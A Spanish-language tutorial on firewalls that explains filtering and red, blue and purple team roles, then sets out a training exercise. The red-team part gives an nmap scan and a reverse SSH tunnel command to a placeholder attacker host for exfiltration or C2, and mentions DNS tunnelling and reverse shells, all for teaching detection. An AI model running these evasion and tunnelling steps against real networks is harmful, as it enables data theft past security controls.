Cortafuegos (Firewalls)
1️⃣ Explicación en Profundidad
Un firewall es como el portero de seguridad de tu red: controla quién entra y quién sale, y bajo qué condiciones. Se trata de un control preventivo que actúa en los límites entre zonas de seguridad, como entre una red interna segura y el peligroso internet.
Los firewalls aplican políticas de acceso a través de reglas de filtrado, conocidas como ACLs (Access Control Lists). Evalúan la información de los paquetes (como direcciones IP, protocolos, y puertos) y deciden si permitir o bloquear el paso. Esto permite establecer zonas segmentadas y protegidas dentro de la red.
🔍 Tipos de filtrado:
-
Filtrado por IP → Controla quién puede acceder según la IP de origen o destino.
-
Filtrado por protocolo → Por ejemplo, permite solo tráfico TCP, UDP o ICMP.
-
Filtrado por puertos → Controla los servicios que se comunican (como el puerto 80 para web o 443 para HTTPS).
-
Filtrado por MAC → Controla dispositivos físicos en redes locales.
🔧 Acciones posibles:
-
Permitir → El paquete pasa sin restricciones.
-
Denegar/Descartar → Se bloquea sin notificar al origen (silencioso).
-
Rechazar → Se bloquea y se notifica al origen con un mensaje ICMP.
📌 Importante: los firewalls deben proteger entradas y salidas (tráfico entrante y saliente). Controlar la salida evita que malware o tráfico no autorizado salga de la red.
2️⃣ Ejemplos Prácticos
-
Empresa con DMZ: Se colocan firewalls entre la red interna, la zona desmilitarizada (DMZ) y el exterior (internet) para controlar qué servicios se exponen y quién accede.
-
Usuario doméstico: El router SOHO que usas en casa contiene un firewall integrado que bloquea conexiones entrantes no solicitadas, ayudando a evitar escaneos y ataques comunes.
3️⃣ Aplicaciones y Herramientas Reales
-
OPNsense y pfSense: firewalls de código abierto muy usados por profesionales.
-
Cisco ASA, Fortinet FortiGate, Palo Alto Networks, Check Point: soluciones de firewall comerciales líderes en el mercado.
-
Firewalld y iptables: firewalls en sistemas Linux.
-
Windows Defender Firewall: integrado en sistemas Windows.
4️⃣ ¿Qué hace un Líder de Red, Blue y Purple Team al respecto?
🔴 Red Team – ¿Cómo se ataca un firewall?
-
Evasión de reglas: uso de técnicas como fragmentación de paquetes, túneles cifrados o encapsulación para ocultar el tráfico malicioso.
-
Escaneo de puertos y fingerprinting para detectar si un firewall está presente y qué servicios permite.
-
Explotación de errores de configuración, como reglas demasiado permisivas o políticas inconsistentes.
🔵 Blue Team – ¿Cómo se protege con firewalls?
-
Diseña reglas mínimas necesarias para el funcionamiento: principio de menor privilegio.
-
Asegura que haya registros (logs) y alertas de tráfico bloqueado.
-
Supervisa tráfico saliente para detectar actividades sospechosas.
-
Aplica actualizaciones constantes en firmware y gestión de reglas.
🟣 Purple Team – ¿Cómo se validan y ajustan estas defensas?
-
Simulan ataques reales (como escaneos de Nmap o exfiltración con netcat) para comprobar qué filtra y qué no.
-
Auditan las políticas de firewall en entornos de laboratorio y producción.
-
Crean documentación y visualización de los flujos de red para detectar reglas innecesarias o peligrosas.
6️⃣ ✅ Resumen práctico
🔐 Un cortafuegos (firewall) es un guardián digital que filtra el tráfico entre zonas de red, basándose en reglas sobre IP, puertos y protocolos. Puede ser físico o software, enrutado o transparente, pero su objetivo es siempre el mismo: permitir solo el tráfico legítimo y bloquear lo potencialmente malicioso. Los firewalls protegen tanto el perímetro como el interior de la red, y su correcta configuración es fundamental para cualquier estrategia de defensa. Mientras que los atacantes intentan evadir sus controles, los defensores deben actualizar sus reglas, observar los registros y validar su eficacia mediante ejercicios Purple Team continuos.
Ejercicio Purple Team – Cortafuegos (Firewalls)
🔴 Ejercicio 1 – Red Team
🎯 Objetivo: Evadir las reglas del firewall de una red objetivo.
Escenario:
Te infiltras en una red segmentada donde el firewall bloquea todos los puertos excepto HTTP (80) y HTTPS (443). Tu objetivo es lograr comunicación hacia afuera para exfiltrar datos o crear un canal de C2.
Técnicas:
-
Usa nmap -Pn -p- -sT --open para identificar los puertos permitidos.
-
Ejecuta un túnel SSH inverso usando el puerto 443:
bashCopiarEditarssh -R 443:localhost:4444 atacante@tunel-remoto.com -
Alternativamente, encapsula tráfico en DNS (técnica de evasión avanzada con iodine).
Herramientas sugeridas:
-
Nmap
-
Iodine (DNS tunneling)
-
SSH
-
Proxychains
-
Metasploit + módulo HTTP/S reverse shell
🔵 Ejercicio 2 – Blue Team
🎯 Objetivo: Detectar y prevenir canales no autorizados a través del firewall.
Acciones:
-
Revisa los logs del firewall para conexiones salientes inusuales hacia el exterior desde puertos 80 o 443 con suricata o zeek.
-
Configura reglas de inspección profunda de paquetes (DPI) en el firewall para detectar tráfico no HTTP real en el puerto 443.
-
Revisa las conexiones activas de los endpoints usando:
bashCopiarEditarnetstat -anp | grep ESTABLISHED -
Usa un IDS (como Snort/Suricata) para identificar patrones de túneles y tráfico anómalo.
Herramientas sugeridas:
-
Suricata
-
Zeek
-
Wazuh o SIEM
-
Firewall de próxima generación (NGFW)
-
Yara o reglas Sigma para análisis de eventos
🟣 Ejercicio 3 – Validación Purple Team
🎯 Objetivo: Validar si el firewall detecta correctamente intentos de evasión.
Paso a paso conjunto:
-
El Red Team lanza un reverse shell cifrado que usa el puerto 443.
-
El Blue Team monitorea la sesión en tiempo real para ver si el firewall lo bloquea o deja pasar.
-
Se comparan logs del firewall, IDS y EDR para verificar si:
-
¿El tráfico fue registrado?
-
¿Se generó alerta?
-
¿Hubo bloqueo o solo visibilidad?
-
-
El Purple Team documenta lo observado y propone una mejora:
-
Regla para inspección del protocolo HTTPs.
-
Alerta específica si hay túneles de shell usando User-Agent inusual.
-
Segmentar aún más los puertos permitidos para ciertos roles.
-
Resultado
🟪 Se ajusta la política del firewall para permitir solo conexiones HTTPS válidas verificadas con inspección SSL, y se configuran alertas de C2 sospechoso en el SIEM.